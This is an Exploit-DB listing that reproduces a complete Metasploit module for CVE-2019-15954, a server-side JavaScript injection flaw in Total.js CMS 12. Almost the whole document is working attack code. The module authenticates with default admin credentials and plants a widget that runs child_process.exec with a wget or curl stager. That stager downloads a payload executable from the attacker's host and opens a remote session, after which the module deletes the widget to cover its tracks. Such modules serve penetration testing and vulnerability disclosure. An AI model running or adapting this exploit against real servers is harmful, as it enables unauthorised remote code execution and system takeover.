Total.js CMS 12 - Widget JavaScript Code Injection (Metasploit)

EDB-ID:

47531




Platform:

Multiple

Date:

2019-10-22


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Total.js CMS 12 Widget JavaScript Code Injection',
      'Description'    => %q{
        This module exploits a vulnerability in Total.js CMS. The issue is that a user with
        admin permission can embed a malicious JavaScript payload in a widget, which is
        evaluated server side, and gain remote code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Riccardo Krauter', # Original discovery
          'sinn3r'            # Metasploit module
        ],
      'Arch'           => [ARCH_X86, ARCH_X64],
      'Targets'        =>
        [
          [ 'Total.js CMS on Linux', { 'Platform' => 'linux', 'CmdStagerFlavor' => 'wget'} ],
          [ 'Total.js CMS on Mac',   { 'Platform' => 'osx', 'CmdStagerFlavor' => 'curl' } ]
        ],
      'References'     =>
        [
          ['CVE', '2019-15954'],
          ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/5'],
          ['URL', 'https://github.com/beerpwn/CVE/blob/master/Totaljs_disclosure_report/report_final.pdf']
        ],
      'DefaultOptions' =>
        {
          'RPORT' => 8000,
        },
      'Notes'          =>
        {
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability'   => [ CRASH_SAFE ]
        },
      'Privileged'     => false,
      'DisclosureDate' => '2019-08-30', # Reported to seclist
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path for Total.js CMS', '/']),
        OptString.new('TOTALJSUSERNAME', [true, 'The username for Total.js admin', 'admin']),
        OptString.new('TOTALJSPASSWORD', [true, 'The password for Total.js admin', 'admin'])
      ])
  end

  class AdminToken
    attr_reader :token

    def initialize(cookie)
      @token = cookie.scan(/__admin=([a-zA-Z\d]+);/).flatten.first
    end

    def blank?
      token.blank?
    end
  end

  class Widget
    attr_reader :name
    attr_reader :category
    attr_reader :source_code
    attr_reader :platform
    attr_reader :url

    def initialize(p, u, stager)
      @name = "p_#{Rex::Text.rand_text_alpha(10)}"
      @category = 'content'
      @platform = p
      @url = u
      @source_code  = %Q|<script total>|
      @source_code << %Q|global.process.mainModule.require('child_process')|
      @source_code << %Q|.exec("sleep 2;#{stager}");|
      @source_code << %Q|</script>|
    end
  end

  def check
    code = CheckCode::Safe

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'admin', 'widgets')
    })

    unless res
      vprint_error('Connection timed out')
      return CheckCode::Unknown
    end

    # If the admin's login page is visited too many times, we will start getting
    # a 401 (unauthorized response). In that case, we only have a header to work
    # with.
    if res.headers['X-Powered-By'].to_s == 'Total.js'
      code = CheckCode::Detected
    end

    # If we are here, then that means we can still see the login page.
    # Let's see if we can extract a version.
    html = res.get_html_document
    element = html.at('title')
    return code unless element.respond_to?(:text)
    title = element.text.scan(/CMS v([\d\.]+)/).flatten.first
    return code unless title
    version = Gem::Version.new(title)

    if version <= Gem::Version.new('12')
      # If we are able to check the version, we could try the default cred and attempt
      # to execute malicious code and see how the application responds. However, this
      # seems to a bit too aggressive so I'll leave that to the exploit part.
      return CheckCode::Appears
    end

    CheckCode::Safe
  end

  def auth(user, pass)
    json_body = { 'name' => user, 'password' => pass }.to_json

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri, 'api', 'login', 'admin'),
      'ctype'  => 'application/json',
      'data'   => json_body
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out')
    end

    json_res = res.get_json_document
    cookies = res.get_cookies
    # If it's an array it could be an error, so we are specifically looking for a hash.
    if json_res.kind_of?(Hash) && json_res['success']
      token = AdminToken.new(cookies)
      @admin_token = token
      return token
    end
    fail_with(Failure::NoAccess, 'Invalid username or password')
  end

  def create_widget(admin_token)
    platform = target.platform.names.first
    host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket::source_address : datastore['SRVHOST']
    port = datastore['SRVPORT']
    proto = datastore['SSL'] ? 'https' : 'http'
    payload_name = "p_#{Rex::Text.rand_text_alpha(5)}"
    url = "#{proto}://#{host}:#{port}#{get_resource}/#{payload_name}"
    widget = Widget.new(platform, url, generate_cmdstager(
        'Path' => "#{get_resource}/#{payload_name}",
        'temp' => '/tmp',
        'file' => payload_name
      ).join(';'))

    json_body = {
      'name'     => widget.name,
      'category' => widget.category,
      'body'     => widget.source_code
    }.to_json

    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
      'cookie' => "__admin=#{admin_token.token}",
      'ctype'  => 'application/json',
      'data'   => json_body
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out')
    end

    res_json = res.get_json_document
    if res_json.kind_of?(Hash) && res_json['success']
      print_good("Widget created successfully")
    else
      fail_with(Failure::Unknown, 'No success message in body')
    end

    widget
  end

  def get_widget_item(admin_token, widget)
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
      'cookie' => "__admin=#{admin_token.token}",
      'ctype'  => 'application/json'
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out')
    end

    res_json = res.get_json_document
    count = res_json['count']
    items = res_json['items']

    unless count
      fail_with(Failure::Unknown, 'No count key found in body')
    end

    unless items
      fail_with(Failure::Unknown, 'No items key found in body')
    end

    items.each do |item|
      widget_name = item['name']
      if widget_name.match(/p_/)
        return item
      end
    end

    []
  end

  def clear_widget
    admin_token = get_admin_token
    widget = get_widget

    print_status('Finding the payload from the widget list...')
    item = get_widget_item(admin_token, widget)

    json_body = {
      'id'          => item['id'],
      'picture'     => item['picture'],
      'name'        => item['name'],
      'icon'        => item['icon'],
      'category'    => item['category'],
      'datecreated' => item['datecreated'],
      'reference'   => item['reference']
    }.to_json

    res = send_request_cgi({
      'method' => 'DELETE',
      'uri'    => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
      'cookie' => "__admin=#{admin_token.token}",
      'ctype'  => 'application/json',
      'data'   => json_body
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out')
    end

    res_json = res.get_json_document
    if res_json.kind_of?(Hash) && res_json['success']
      print_good("Widget cleared successfully")
    else
      fail_with(Failure::Unknown, 'No success message in body')
    end
  end

  def on_request_uri(cli, req)
    print_status("#{cli.peerhost} requesting: #{req.uri}")

    if req.uri =~ /p_.+/
      payload_exe = generate_payload_exe(code: payload.encoded)
      print_status("Sending payload to #{cli.peerhost}")
      send_response(cli, payload_exe, {'Content-Type' => 'application/octet-stream'})
      return
    end

    send_not_found(cli)
  end

  def on_new_session(session)
    clear_widget
  end

  # This is kind of for cleaning up the wiget, because we cannot pass it as an
  # argument in on_new_session.
  def get_widget
    @widget
  end

  # This is also kind of for cleaning up widget, because we cannot pass it as an
  # argument directly
  def get_admin_token
    @admin_token
  end

  def exploit
    user = datastore['TOTALJSUSERNAME']
    pass = datastore['TOTALJSPASSWORD']
    print_status("Attempting to authenticate with #{user}:#{pass}")
    admin_token = auth(user, pass)
    fail_with(Failure::Unknown, 'No admin token found') if admin_token.blank?
    print_good("Authenticatd as: #{user}:#{pass}")
    print_status("Creating a widget...")
    @widget = create_widget(admin_token)
    super
  end

end